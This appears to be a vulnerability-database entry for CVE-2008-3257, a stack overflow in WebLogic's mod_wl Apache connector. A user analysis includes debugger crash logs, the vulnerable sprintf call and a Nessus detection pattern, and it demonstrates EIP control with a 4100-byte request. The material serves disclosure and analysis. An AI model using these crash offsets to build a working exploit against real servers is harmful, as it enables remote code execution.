Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
0

Oracle mod_wl HTTP POST Request Remote Buffer Overflow Vulnerability

Disclosure Date: July 22, 2008
CVE-2008-3257
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after “POST /.jsp” in an HTTP request.

Add Assessment

1
Technical Analysis

Details

Bea Weblogic 8.1 + Apache
http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html

First crash

(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0         ov up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416    add     byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr  Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

More controlled crash: length 4100

ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

mod_wl detection via nessus

weblogic_mod_wl_overflow.nasl: “TITLE>Weblogic Bridge Message” >< res[2] ||

POST /index.jsp  HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1

TML>
<HEAD>
<TITLE>Weblogic Bridge Message
</TITLE>
</HEAD>
 <BODY>
<H2>Failure of server APACHE bridge:</H2><P>
<hr><PRE>Internal Server failure, APACHE plugin.  Cannot continue.</PRE>
<hr><BR><B>Build date/time:</B> <I>Jun 16 2006 15:14:11</I>
<P><HR><B>Change Number:</B> <I>779586</I>
 </BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>Weblogic Bridge Message

mod_wl overflow

.text:1000E751                 push    ecx             ; it should be HTTP/1.1 but.... failed :)
.text:1000E752                 push    edx
.text:1000E753                 mov     edx, [ebp+214h]
.text:1000E759                 push    edx
.text:1000E75A                 push    offset aSSS     ; "%s %s %s\r\n"
.text:1000E75F                 push    eax             ; Dest
.text:1000E760                 call    ds:sprintf      ; here is where overflow happends!

GET EIP on RET

0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000    add     esp,101Ch
0:244> db esp
0440c7b8  1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00  ............J...
0440c7c8  48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e  Host: 192.168.1.
0440c7d8  31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a  130..User-Agent:
0440c7e8  20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f   Mozilla/4.0 (co
0440c7f8  6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36  mpatible; MSIE 6
0440c808  2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35  .0; Windows NT 5
0440c818  2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70  .1)..Content-Typ
0440c828  65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78  e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3              ret
0:244> db esp
0440d7d4  41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08  AAAAAAAA........
0440d7e4  09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a  ................
0440d7f4  1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a  ..... !"#$%&'()*
0440d804  2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a  +,-./0123456789:
0440d814  3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b  ;<=>@ABCDEFGHIJK
0440d824  4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b  LMNOPQRSTUVWXYZ[
0440d834  5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b  \]^_`abcdefghijk
0440d844  6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b  lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
41414141 ??              ???

References

http://www.securityfocus.com/bid/30273/info

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown
Technical Analysis